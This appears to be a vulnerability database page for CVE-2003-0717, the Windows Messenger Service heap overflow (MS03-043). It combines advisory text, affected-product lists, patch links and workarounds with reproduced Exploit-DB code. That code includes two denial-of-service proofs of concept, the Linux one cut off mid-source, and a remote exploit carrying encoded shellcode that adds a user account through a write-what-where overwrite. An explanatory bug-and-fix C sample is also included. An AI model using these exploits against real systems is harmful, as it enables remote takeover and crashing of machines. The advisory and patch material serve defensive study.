CVE-2003-0717
CVSS 7.5
Published: 2003-11-17 00:00:00
Revised: 2016-10-17 22:36:49
NMCOES

[Original] The Messenger Service for Windows NT through Server 2003 does not properly verify the length of the message, which allows remote attackers to execute arbitrary code via a buffer overflow attack.


[CNNVD] Microsoft Windows Messenger Service Remote Heap Overflow Vulnerability (MS03-043/KB828035) (CNNVD-200311-085)

        
Microsoft Windows is the Windows operating system developed by Microsoft. The Windows Messenger service is used to send short messages between servers and clients.
The Microsoft Windows Messenger service has a heap overflow that a remote attacker can exploit to execute arbitrary code on the target machine with system privileges.
The problem lies in the Messenger service's search-by-name function: submitting a specially sequenced string to this function causes a heap overflow, and carefully crafted data may execute arbitrary code on the target machine with system privileges.
Messages reach the Messenger service via NetBIOS or RPC, so they can be blocked by closing the NetBIOS ports (137-139) and filtering UDP broadcasts at the firewall.
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_nt:4.0:sp6a:server  Microsoft Windows 4.0 sp6a server
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/o:microsoft:windows_2000::sp3:datacenter_server  Microsoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_2000::sp4:datacenter_server  Microsoft Windows 2000 Datacenter Server SP4
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_2000::sp1:datacenter_server  Microsoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp2:datacenter_server  Microsoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp5:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP5
cpe:/o:microsoft:windows_nt:4.0:sp2:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP2
cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP6
cpe:/o:microsoft:windows_nt:4.0:sp6a:enterprise_server
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_nt:4.0:sp5:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6a:workstation  Microsoft Windows 4.0 sp6a workstation
cpe:/o:microsoft:windows_2000::sp3:professional  Microsoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:microsoft:windows_2000::sp4:professional  Microsoft Windows 2000 Professional SP4
cpe:/o:microsoft:windows_nt:4.0:sp5:server  Microsoft Windows 4.0 sp5 server
cpe:/o:microsoft:windows_2000::sp1:professional  Microsoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_nt:4.0:sp6:server  Microsoft Windows 4.0 sp6 server
cpe:/o:microsoft:windows_2000::sp2:professional  Microsoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_nt:4.0:sp3:server  Microsoft Windows 4.0 sp3 server
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_nt:4.0:sp4:server  Microsoft Windows 4.0 sp4 server
cpe:/o:microsoft:windows_nt:4.0:sp1:server  Microsoft Windows 4.0 sp1 server
cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_nt:4.0:sp2:server  Microsoft Windows 4.0 sp2 server
cpe:/o:microsoft:windows_2000::sp1:server  Microsoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp4:server  Microsoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_2000::sp3:server  Microsoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000::sp2:server  Microsoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp5:workstation  Microsoft Windows 4.0 sp5 workstation
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_nt:4.0:sp6:workstation  Microsoft Windows 4.0 sp6 workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:workstation  Microsoft Windows 4.0 sp3 workstation
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_nt:4.0:sp4:workstation  Microsoft Windows 4.0 sp4 workstation
cpe:/o:microsoft:windows_nt:4.0:sp1:workstation  Microsoft Windows 4.0 sp1 workstation
cpe:/o:microsoft:windows_nt:4.0:sp2:workstation  Microsoft Windows 4.0 sp2 workstation
cpe:/o:microsoft:windows_nt:4.0::workstation
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:microsoft:windows_nt:4.0::enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp3:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp4:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp1:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp2:enterprise_server
cpe:/o:microsoft:windows_nt:4.0::server
cpe:/o:microsoft:windows_nt:4.0:sp4:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP4
cpe:/o:microsoft:windows_nt:4.0:sp1:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP1
cpe:/o:microsoft:windows_nt:4.0:sp3:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP3
cpe:/o:microsoft:windows_xp::gold:professional  Microsoft Windows XP Professional Gold
cpe:/o:microsoft:windows_me  Microsoft Windows ME
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:microsoft:windows_2000::sp4:advanced_server  Microsoft Windows 2000 Advanced Server SP4
cpe:/o:microsoft:windows_2000::sp3:advanced_server  Microsoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:advanced_server  Microsoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_server  Microsoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_xp:::home

- OVAL (technical details for detection)

oval:org.mitre.oval:def:268  Windows XP Messenger Service Buffer Overflow
oval:org.mitre.oval:def:213  Windows 2000 Messenger Service Buffer Overflow
*OVAL describes in detail how this vulnerability is detected; the related OVAL definitions contain further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0717
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0717
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-085
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=106666713812158&w=2
(UNKNOWN)  BUGTRAQ  20031018 Proof of concept for Windows Messenger Service overflow
http://marc.info/?l=ntbugtraq&m=106632188709562&w=2
(UNKNOWN)  BUGTRAQ  20031016 MS03-043 Popup Messenger Servce buffer-overflow
http://www.cert.org/advisories/CA-2003-27.html
(UNKNOWN)  CERT  CA-2003-27
http://www.kb.cert.org/vuls/id/575892
(VENDOR_ADVISORY)  CERT-VN  VU#575892
http://www.microsoft.com/technet/security/bulletin/ms03-043.asp
(VENDOR_ADVISORY)  MS  MS03-043
http://www.securityfocus.com/bid/8826
(VENDOR_ADVISORY)  BID  8826

- Vulnerability information

Microsoft Windows Messenger Service Remote Heap Overflow Vulnerability (MS03-043/KB828035)
High risk  Boundary condition error
2003-11-17 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        Temporary workarounds:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * On the perimeter firewall or a personal firewall, block untrusted hosts from reaching the NetBIOS and RPC ports 135, 137 and 139 (TCP/UDP)
        * Disable the Messenger service.
        Open "Start" (or open "Settings"), click "Control Panel", then double-click "Administrative Tools", double-click "Services", find and double-click "Messenger", choose "Disabled" in the "Startup type" drop-down, then click "Stop", then click "OK".
        Vendor patches:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS03-043) and the corresponding patches for this issue:
        MS03-043: Buffer Overrun in Messenger Service Could Allow Code Execution (828035)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS03-043.asp

        Patch downloads:
        * Microsoft Windows NT Workstation 4.0, Service Pack 6a
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=7597FCF4-6615-4074-9E46-A17D808ED38D&displaylang=en

        * Microsoft Windows NT Server 4.0, Service Pack 6a
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=B1949456-996A-485A-9A28-79FD79F26A1B&displaylang=en

        * Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=64AB4B66-1A6E-4264-93A8-26CDB98B05A8&displaylang=en

        * Microsoft Windows 2000, Service Pack 2
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=A0061377-1683-4C13-9527-5534F6C7CF85&displaylang=en

        * Microsoft Windows 2000, Service Pack 3, Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=99F1B40D-906A-4945-A021-4B494CCCBDE0&displaylang=en

        * Microsoft Windows XP Gold, Service Pack 1
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=F02DA309-4B0A-4438-A0B9-5B67414C3833&displaylang=en

        * Microsoft Windows XP 64-bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=2BE95254-4C65-4CA5-80A5-55FDF5AA2296&displaylang=en

        * Microsoft Windows XP 64-bit Edition Version 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=8B990946-84C8-4C91-899C-5A44EC13174E&displaylang=en

        * Microsoft Windows Server 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=1DF106F3-7EC4-4EB0-9143-C1E3C9E2F5F8&displaylang=en

        * Microsoft Windows Server 2003 64-bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=8B990946-84C8-4C91-899C-5A44EC13174E&displaylang=en

- Vulnerability information (111)

MS Windows Messenger Service Denial of Service Exploit (MS03-043) (EDBID:111)
windows dos
2003-10-18 Verified
0 LSD-PLaNET
N/A
/*

DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.
Launching it one or two times against the target should make the 
machine reboot. Tested against a Win2K SP4.

"The vulnerability results because the Messenger Service does not 
properly validate the length of a message before passing it to the allocated 
buffer" according to MS bulletin. Digging into it a bit more, we find that when 
a character 0x14 is encountered in the 'body' part of the message, it is 
replaced by a CR+LF. The buffer allocated for this operation is twice the size 
of the string, which is the way to go, but is then copied to a buffer which 
was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks 
and overflow the fixed size buffer.

Credits go to LSD :)

*/

#include <stdio.h>
#include <winsock.h>
#include <string.h>
#include <time.h>

// Packet format found thanks to a bit of sniffing
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff" // @74 : fields length
"\x00\x00";

// Exploit downloaded on www.k-otik.com
unsigned char field_header[] =
"\xff\xff\xff\xff" // @0 : field length
"\x00\x00\x00\x00"
"\xff\xff\xff\xff"; // @8 : field length

int main(int argc,char *argv[])
{
	int i, packet_size, fields_size, s;
	unsigned char packet[8192];
	struct sockaddr_in addr;
	// A few conditions :
	// 0 <= strlen(from) + strlen(machine) <= 56
	// max fields size 3992
	char from[] = "RECCA";
	char machine[] = "ZEUS";
	char body[4096] = "*** MESSAGE ***";

	WSADATA wsaData;

	WSAStartup(0x0202, &wsaData);

	ZeroMemory(&addr, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = inet_addr("192.168.186.3");
	addr.sin_port = htons(135);

	ZeroMemory(packet, sizeof(packet));
	packet_size = 0;

	memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 
1);
	packet_size += sizeof(packet_header) - 1;

	i = strlen(from) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], from);
	packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

	i = strlen(machine) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], machine);
	packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

	fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 
3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
	memset(body, 0x14, sizeof(body));
	body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) 
- 1] = '\0';

	i = strlen(body) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], body);
	packet_size += i;

	fields_size = packet_size - (sizeof(packet_header) - 1);
	*(unsigned int *)(&packet[40]) = time(NULL);
	*(unsigned int *)(&packet[74]) = fields_size;

	fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size);

/*
	for (i = 0; i < packet_size; i++)
	{
		if (i && ((i & 1) == 0))
			fprintf(stdout, " ");
		if (i && ((i & 15) == 0))
			fprintf(stdout, "\n");
		fprintf(stdout, "%02x", packet[i]);
	}
	fprintf(stdout, "\n");
*/
	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
		exit(EXIT_FAILURE);

	if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, 
sizeof(addr)) == -1)
		exit(EXIT_FAILURE);
/*
	if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1)
		exit(EXIT_FAILURE);
*/

	exit(EXIT_SUCCESS);
}

// milw0rm.com [2003-10-18]
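The header comment of the proof of concept above pins the defect down to a length check that is applied before the 0x14 to CR+LF expansion, after which the expanded data is copied into a buffer of only 11CAh bytes. The program below is an added illustration of that bug class and of the corresponding fix; it is not the Messenger service's code and not part of any exploit on this page. The constants 0x11CA and 3992 are the ones quoted in the comment above; every function name, the way the overrun is reported as a number instead of being performed, and the sample message bodies are constructed for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Sizes quoted in the exploit header above: the fixed destination buffer is
 * 11CAh bytes and the fields section is limited to 3992 bytes. The code
 * around them is an illustrative reconstruction, not the service's code. */
#define FIXED_BUF_SIZE  0x11CAu     /* 4554 bytes */
#define MAX_FIELDS_SIZE 3992u

/* Length of `in` once every 0x14 byte has been expanded to CR+LF. */
size_t expanded_length(const unsigned char *in, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        n += (in[i] == 0x14) ? 2 : 1;
    return n;
}

/* Expand 0x14 -> CR LF into `out`; the caller must size `out` for the
 * expanded length. Returns the number of bytes written. */
size_t expand_ctrl_chars(const unsigned char *in, size_t len, unsigned char *out)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (in[i] == 0x14) {
            out[n++] = '\r';
            out[n++] = '\n';
        } else {
            out[n++] = in[i];
        }
    }
    return n;
}

/* Vulnerable pattern: only the pre-expansion length is checked. Instead of
 * copying into a fixed 0x11CA-byte buffer, this returns how many bytes such
 * a copy would run past the buffer, so the example is safe to execute.
 * 0 means the message was either rejected or fits. */
size_t vulnerable_overrun_bytes(const unsigned char *in, size_t len)
{
    if (len > MAX_FIELDS_SIZE)
        return 0;                       /* the only check the service applied */
    size_t expanded = expanded_length(in, len);
    return expanded > FIXED_BUF_SIZE ? expanded - FIXED_BUF_SIZE : 0;
}

/* Hardened pattern: compute the post-expansion length and compare it with
 * the real capacity of the destination before writing a single byte.
 * Returns bytes written, or -1 if the message is rejected. */
long copy_message_hardened(const unsigned char *in, size_t len,
                           unsigned char *dst, size_t dst_cap)
{
    if (len > MAX_FIELDS_SIZE)
        return -1;
    size_t need = expanded_length(in, len);
    if (need > dst_cap)
        return -1;                      /* would not fit after expansion */
    return (long)expand_ctrl_chars(in, len, dst);
}

/* Constructed sample input: a body of n bytes, all 0x14 (n <= 4096). */
size_t demo_overrun(size_t n)
{
    unsigned char body[4096];
    if (n > sizeof body)
        return 0;
    memset(body, 0x14, n);
    return vulnerable_overrun_bytes(body, n);
}

long demo_hardened(size_t n)
{
    unsigned char body[4096];
    unsigned char dst[FIXED_BUF_SIZE];
    if (n > sizeof body)
        return -1;
    memset(body, 0x14, n);
    return copy_message_hardened(body, n, dst, sizeof dst);
}

int main(void)
{
    /* 3000 input bytes pass the 3992-byte check but expand to 6000 bytes. */
    printf("3000 x 0x14: vulnerable path overruns by %zu bytes, hardened path returns %ld\n",
           demo_overrun(3000), demo_hardened(3000));
    /* 2000 input bytes expand to 4000 bytes and fit either way. */
    printf("2000 x 0x14: vulnerable path overruns by %zu bytes, hardened path returns %ld\n",
           demo_overrun(2000), demo_hardened(2000));
    return 0;
}
```

The vulnerable path is modelled as a computation of how far the copy would run past the buffer rather than as an actual out-of-bounds write, so the program runs safely. The hardened path shows the general rule this bug violates: when data is transformed before it is stored, the bounds check must use the post-transformation length (or the destination must be sized from it), never the length of the input.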
		

- Vulnerability information (135)

MS Windows Messenger Service Remote Exploit FR (MS03-043) (EDBID:135)
windows remote
2003-12-16 Verified
135 MrNice
N/A
/*******************************************************************/
/*
 *  [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]
 *  ---------------------------------------------------
 *
 *  This Sploit uses the unhandledexceptionfilter to redirect
 *  the execution. When the overflow occurs we have:
 *
 *      mov     eax,esi+8
 *      mov     ecx,esi+Ch
 *      mov     dword ptr ds:[ecx],eax
 *
 *  so we control ecx and edx and we can write 4 bytes
 *  where we want.
 *  If we try to write in a non-writable memory zone, an
 *  exception is launched and unhandledexceptionfilter too.
 *
 *  A part of unhandledexceptionfilter:
 *
 *      mov     eax, dword_0_77ECF44C(=where)
 *      cmp     eax, ebx
 *      jz      short loc_0_77EA734C
 *      push    esi
 *      call    eax
 *
 *  So we write the "WHAT" (=jmp esi+4Ch) at
 *  the "WHERE" (=77EA734C here) and when the exception occurs
 *  the unhandledexceptionfilter is launched, so when call eax
 *  occurs, it executes our code.
 *
 *  Thanks to Kotik who coded the proof of concept, and Metasploit
 *  for the shellcode, and last but not least kralor and Scurt from Crpt
 *
 *  Tested on win2k FR SP0
 */
/*******************************************************************/

#ifdef _WIN32
#include <winsock.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/timeb.h>
#include <string.h>
#endif
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" 
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00";


unsigned char field_header[] =
"\xff\xff\xff\xff"
"\x00\x00\x00\x00"
"\xff\xff\xff\xff";

unsigned char ShellCode[] = // XorDecode	23 bytes
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x96\xE2\xFA" 
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// AddUser:X Pass:X
"\xf0\x17\x7a\x16\x96\x1f\x70\x7e\x21\x96\x96\x96\x1f\x90\x1f\x55"
"\xc5\xfe\xe8\x4e\x74\xe5\x7e\x2b\x96\x96\x96\x1f\xd0\x9a\xc5\xfe"
"\x18\xd8\x98\x7a\x7e\x39\x96\x96\x96\x1f\xd0\x9e\xa7\x4d\xc5\xfe"
"\xe6\xff\xa5\xa4\xfe\xf8\xf3\xe2\xf7\xc2\x69\x46\x1f\xd0\x92\x1f"
"\x55\xc5\xfe\xc8\x49\xea\x5b\x7e\x1a\x96\x96\x96\x1f\xd0\x86\xc5"
"\xfe\x41\xab\x9a\x55\x7e\xe8\x96\x96\x96\x1f\xd0\x82\xa7\x56\xa7"
"\x4d\xd5\xc6\xfe\xe4\x96\xe5\x96\xfe\xe2\x96\xf9\x96\xfe\xe4\x96"
"\xf7\x96\xfe\xe5\x96\xe2\x96\xfe\xf8\x96\xff\x96\xfe\xfb\x96\xff"
"\x96\xfe\xd7\x96\xf2\x96\x1f\xf0\x8a\xc6\xfe\xce\x96\x96\x96\x1f"
"\x77\x1f\xd8\x8e\xfe\x96\x96\xca\x96\xc6\xc5\xc6\xc6\xc5\xc6\xc7"
"\xc7\x1f\x77\xc6\xc2\xc7\xc5\xc6\x69\xc0\x86\x1d\xd8\x8e\xdf\xdf"
"\xc7\x1f\x77\xfc\x97\xc7\xfc\x95\x69\xe0\x8a\xfc\x96\x69\xc0\x82"
"\x69\xc0\x9a\xc0\xfc\xa6\xcf\xf2\x1d\x97\x1d\xd6\x9a\x1d\xe6\x8a"
"\x3b\x1d\xd6\x9e\xc8\x54\x92\x96\xc5\xc3\xc0\xc1\x1d\xfa\xb2\x8e"
"\x1d\xd3\xaa\x1d\xc2\x93\xee\x97\x7c\x1d\xdc\x8e\x1d\xcc\xb6\x97"
"\x7d\x75\xa4\xdf\x1d\xa2\x1d\x97\x78\xa7\x69\x6a\xa7\x56\x3a\xae"
"\x76\xe2\x91\x57\x59\x9b\x97\x51\x7d\x64\xad\xea\xb2\x82\xe3\x77"
"\x1d\xcc\xb2\x97\x7d\xf0\x1d\x9a\xdd\x1d\xcc\x8a\x97\x7d\x1d\x92"
"\x1d\x97\x7e\x7d\x94\xa7\x56\x1f\x7c\xc9\xc8\xcb\xcd\x54\x9e\x96";


int main(int argc,char *argv[])
{
	int i, packet_size, fields_size, s,sp;
	unsigned char packet[8192];
	struct sockaddr_in addr;
	// A few conditions :
	// 0 <= strlen(from) + strlen(machine) <= 56
	// max fields size 3992
	char from[] = "RECCA";
	char machine[] = "ZEUS";
	char body[4096] = "*** MESSAGE ***";
#ifdef _WIN32
	WSADATA wsaData;
#endif

	if(argc<2)
	   {
	printf("\t     [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]\n");
	printf("\t\t  www.coromputer.net && Undernet #coromputer\n");
                printf("---------------------------------------------------------------\n");
                printf("Tested on Windows 2000 French Sp0\n\n");
                printf("Downloaded from www.K-OTik.com\n");
                printf("Syntax : %s <ip>\n",argv[0]);
                return -1;
  	   }

#ifdef _WIN32
	if(WSAStartup(0x101,&wsaData)) {
		printf("error: unable to load winsock.\n");
                return -1;
		}
#endif

	memset(&addr,0x00,sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = inet_addr(argv[1]);
	addr.sin_port = htons(135);

	memset(packet,0x00,sizeof(packet));
	packet_size = 0;

	memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
	packet_size += sizeof(packet_header) - 1;

	i = strlen(from) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], from);
	packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

	i = strlen(machine) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], machine);
	packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

	printf("Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
	memset(body, 0x14, sizeof(body));
	
	
	body[2263]=(char)0x90;
	body[2264]=(char)0x90;
	body[2265]=(char)0x90;
	body[2266]=(char)0x90;
	
	body[2267]=(char)0x90;
	body[2268]=(char)0x90;
	
	// jmp 8 bytes further
	body[2269]=(char)0xeb;
	body[2270]=(char)0x08;
	
	//WHAT CRYPTSVC.dll Win2k sp0 FRENCH
	body[2271]=(char)0x48;
	body[2272]=(char)0x65;
	body[2273]=(char)0x87;
	body[2274]=(char)0x76;
	
	//WHERE win2k sp0 FRENCH
	body[2275]=(char)0x4C;
	body[2276]=(char)0xF4;
	body[2277]=(char)0xEC;
	body[2278]=(char)0x77;
	   
	for(i=2279;i<2606;i++)
		body[i]=ShellCode[i-2279];
	
	body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';

	i = strlen(body) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], body);
	packet_size += i;

	fields_size = packet_size - (sizeof(packet_header) - 1);
	*(unsigned int *)(&packet[40]) = time(NULL);
	*(unsigned int *)(&packet[74]) = fields_size;

	printf("Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) 
                + strlen(machine) + strlen(body), packet_size, fields_size);


	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
		printf("error: unable to create socket\n");
		return -1;
		}

	if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
		printf("error: unable to send packet\n");
                return -1;
		}
	return 0;
}


// milw0rm.com [2003-12-16]
		

- Vulnerability information (385)

MS Messenger Denial of Service Exploit (MS03-043) (linux ver) (EDBID:385)
windows dos
2004-08-08 Verified
0 VeNoMouS
N/A
/*
Mon Oct 20 14:26:55 NZDT 2003

Re-written by VeNoMouS to be ported to linux, and tidy it up a little.
This was only like a 5 minute port but it works and has been tested.
venomgen-x.co.nz

greets to str0ke and defy


DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.
Launching it one or two times against the target should make the
machine reboot. Tested against a Win2K SP4.

"The vulnerability results because the Messenger Service does not
properly validate the length of a message before passing it to the allocated
buffer" according to MS bulletin. Digging into it a bit more, we find that
when a character 0x14 is encountered in the 'body' part of the message, it is
replaced by a CR+LF. The buffer allocated for this operation is twice the
size of the string, which is the way to go, but is then copied to a buffer which
was only allocated 11CAh bytes. Thanks to that, we can bypass the length
checks and overflow the fixed size buffer.

Credits go to LSD :)

*/
  
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 
#include <errno.h> 
#include <time.h> 
  
#include <sys/types.h> 
#include <sys/socket.h> 
#include <arpa/inet.h> 
  
  
  
  
  
// Packet format found thanks to a bit of sniffing
static unsigned char packet_header[] = 
"\x04\x00\x28\x00" 
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" 
"\x4f\xb6\xe6\xfc" 
"\xff\xff\xff\xff" // 40 : unique id over 16 bytes ? 
"\xff\xff\xff\xff" 
"\xff\xff\xff\xff" 
"\xff\xff\xff\xff" 
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\xff\xff\xff\xff" 
"\xff\xff\xff\xff" // 74 : fields length 
"\x00\x00"; 
  
unsigned char field_header[] = 
"\xff\xff\xff\xff" // 0 : field length 
"\x00\x00\x00\x00" 
"\xff\xff\xff\xff"; // 8 : field length 
  


int usage(char *name)
{
 printf("Proof of Concept for Windows Messenger Service Overflow..\n");
 printf("- Originally By Hanabishi Recca - recca@mail.ru\n\n");
 printf("- Ported to linux by VeNoMouS..\n");
 printf("- venomgen-x.co.nz\n\n\n");

 printf("example : %s -d yourputtersux -i 10.33.10.4 -s n0nlameputer\n",name);
 printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n");
 printf("-s <src netbios name>\n");
 return 1;
}
  


int main(int argc,char *argv[])
{
        int i, packet_size, fields_size, s;
        int c;                               /* getopt() returns int, so compare against EOF as int */
        unsigned char packet[8192];
        struct sockaddr_in addr = {0};       /* zeroed so the "-i supplied?" check below is defined */
        char from[57] = "", machine[57] = ""; /* zeroed so the strlen() checks below are defined */
        char body[4096] = "*** MESSAGE ***";
  
  if(argc <= 2) 
  { 
  usage(argv[0]); 
  exit(0); 
  } 
  
    while ((c = getopt (argc, argv, "d:i:s:h")) != EOF) 
  switch(c) 
   { 
   case 'd': 
      strncpy(machine,optarg,sizeof(machine)); 
      printf("Machine is %s\n",machine); 
      break; 
   case 'i': 
            memset(&addr, 0,sizeof(addr)); 
            addr.sin_family = AF_INET; 
            addr.sin_addr.s_addr = inet_addr(optarg); 
            addr.sin_port = htons(135); 
      break; 
